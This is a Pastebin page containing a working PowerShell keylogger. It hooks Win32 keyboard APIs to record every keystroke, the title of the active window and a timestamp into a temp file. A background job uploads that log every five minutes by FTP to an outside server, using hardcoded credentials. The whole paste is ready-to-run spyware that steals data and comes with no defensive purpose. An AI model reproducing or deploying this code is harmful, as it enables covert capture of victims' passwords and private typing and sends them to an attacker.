API tools faq
paste
Advertisement
Guest User

Powershell Keylogger

a guest
Oct 10th, 2016
178
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 6.31 KB | None | 0 0
raw download clone embed print report
  1. <#
  2.  
  3. PowerShell keystroke logger
  4.  
  5. Pasted together by
  6. |-TheDoctor-|
  7.  
  8. #>
  9. function KeyLog {
  10.  
  11.     # MapVirtualKeyMapTypes
  12.     # <summary>
  13.     # uCode is a virtual-key code and is translated into a scan code.
  14.     # If it is a virtual-key code that does not distinguish between left- and
  15.     # right-hand keys, the left-hand scan code is returned.
  16.     # If there is no translation, the function returns 0.
  17.     # </summary>
  18.     $MAPVK_VK_TO_VSC = 0x00
  19.  
  20.     # <summary>
  21.     # uCode is a scan code and is translated into a virtual-key code that
  22.     # does not distinguish between left- and right-hand keys. If there is no
  23.     # translation, the function returns 0.
  24.     # </summary>
  25.     $MAPVK_VSC_TO_VK = 0x01
  26.  
  27.     # <summary>
  28.     # uCode is a virtual-key code and is translated into an unshifted
  29.     # character value in the low-order word of the return value. Dead keys (diacritics)
  30.     # are indicated by setting the top bit of the return value. If there is no
  31.     # translation, the function returns 0.
  32.     # </summary>
  33.     $MAPVK_VK_TO_CHAR = 0x02
  34.  
  35.     # <summary>
  36.     # Windows NT/2000/XP: uCode is a scan code and is translated into a
  37.     # virtual-key code that distinguishes between left- and right-hand keys. If
  38.     # there is no translation, the function returns 0.
  39.     # </summary>
  40.     $MAPVK_VSC_TO_VK_EX = 0x03
  41.  
  42.     # <summary>
  43.     # Not currently documented
  44.     # </summary>
  45.     $MAPVK_VK_TO_VSC_EX = 0x04
  46.  
  47.     $virtualkc_sig = @'
  48. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  49. public static extern short GetAsyncKeyState(int virtualKeyCode);
  50. '@
  51.  
  52.     $kbstate_sig = @'
  53. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  54. public static extern int GetKeyboardState(byte[] keystate);
  55. '@
  56.  
  57.     $mapchar_sig = @'
  58. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  59. public static extern int MapVirtualKey(uint uCode, int uMapType);
  60. '@
  61.  
  62.     $tounicode_sig = @'
  63. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  64. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  65. '@
  66.  
  67.     $foreground_sig = @'
  68. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  69. public static extern IntPtr GetForegroundWindow();
  70. '@
  71.  
  72.     $getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
  73.     $getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
  74.     $getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
  75.     $getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
  76.     $getForeground = Add-Type -MemberDefinition $foreground_sig -name "Win32MyGetForeground" -namespace Win32Functions -passThru
  77.  
  78.     while ($true) {
  79.         Start-Sleep -Milliseconds 40
  80.         $gotit = ""
  81.  
  82.         for ($char = 1; $char -le 254; $char++) {
  83.             $vkey = $char
  84.             $gotit = $getKeyState::GetAsyncKeyState($vkey)
  85.  
  86.             if ($gotit -eq -32767) {
  87.  
  88.                 $EnterKey = $getKeyState::GetAsyncKeyState(13)
  89.                 $TabKey = $getKeyState::GetAsyncKeyState(9)
  90.                 $DeleteKey = $getKeyState::GetAsyncKeyState(46)
  91.                 $BackSpaceKey = $getKeyState::GetAsyncKeyState(8)
  92.                 $LeftArrow = $getKeyState::GetAsyncKeyState(37)
  93.                 $UpArrow = $getKeyState::GetAsyncKeyState(38)
  94.                 $RightArrow = $getKeyState::GetAsyncKeyState(39)
  95.                 $DownArrow = $getKeyState::GetAsyncKeyState(40)
  96.  
  97.                 $caps_lock = [console]::CapsLock
  98.  
  99.                 $scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
  100.  
  101.                 $kbstate = New-Object Byte[] 256
  102.                 $checkkbstate = $getKBState::GetKeyboardState($kbstate)
  103.  
  104.                 $TopWindow = $getForeground::GetForegroundWindow()
  105.                 $WindowTitle = (Get-Process | Where-Object { $_.MainWindowHandle -eq $TopWindow }).MainWindowTitle
  106.  
  107.                 $LogOutput = "`"" + $WindowTitle + "`"`t`t`t"
  108.  
  109.                 $mychar = New-Object -TypeName "System.Text.StringBuilder";
  110.                 $unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
  111.  
  112.                 $LogOutput += $mychar.ToString();
  113.                
  114.                 if ($EnterKey)     {$LogOutput += '[ENTER]'}
  115.                 if ($TabKey)       {$LogOutput += '[Tab]'}
  116.                 if ($DeleteKey)    {$LogOutput += '[Delete]'}
  117.                 if ($BackSpaceKey) {$LogOutput += '[Backspace]'}
  118.                 if ($LeftArrow)    {$LogOutput += '[Left Arrow]'}
  119.                 if ($RightArrow)   {$LogOutput += '[Right Arrow]'}
  120.                 if ($UpArrow)      {$LogOutput += '[Up Arrow]'}
  121.                 if ($DownArrow)    {$LogOutput += '[Down Arrow]'}
  122.  
  123.                 $TimeStamp = (Get-Date -Format dd/MM/yyyy:HH:mm:ss:ff)
  124.                 $LogOutput += "`t`t`t`t`t" + $TimeStamp
  125.                
  126.                 if ($unicode_res -gt 0) {
  127.                     $logfile = "$env:temp\key.log"
  128.                     $LogOutput | Out-File -FilePath $logfile -Append
  129.                 }
  130.             }
  131.         }
  132.     }
  133. }
  134.  
  135. Start-Job {
  136.  
  137.     # Config
  138.     $Username = "russenzeug"
  139.     $Password = "w0dk4f0rth34rmy"
  140.     $LocalFile = "$env:temp\key.log"
  141.     $RemoteFile = "ftp://russenzeug.bplaced.net/Logs/Log.txt"
  142.     $SleepTime = 300
  143.  
  144.     while (1 -eq 1)
  145.     {
  146.         # Sleep for specified time
  147.         Start-Sleep -Seconds $SleepTime
  148.  
  149.         # Create FTP Rquest Object
  150.         $FTPRequest = [System.Net.FtpWebRequest]::Create("$RemoteFile")
  151.         $FTPRequest = [System.Net.FtpWebRequest]$FTPRequest
  152.         $FTPRequest.Method = [System.Net.WebRequestMethods+Ftp]::UploadFile
  153.         $FTPRequest.Credentials = new-object System.Net.NetworkCredential($Username, $Password)
  154.         $FTPRequest.UseBinary = $true
  155.         $FTPRequest.UsePassive = $true
  156.  
  157.         # Read the File for Upload
  158.         $FileContent = gc -en byte $LocalFile
  159.         $FTPRequest.ContentLength = $FileContent.Length
  160.  
  161.         # Get Stream Request by bytes
  162.         $Run = $FTPRequest.GetRequestStream()
  163.         $Run.Write($FileContent, 0, $FileContent.Length)
  164.  
  165.         # Cleanup
  166.         $Run.Close()
  167.         $Run.Dispose()
  168.     }
  169. }
  170.  
  171. KeyLog
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!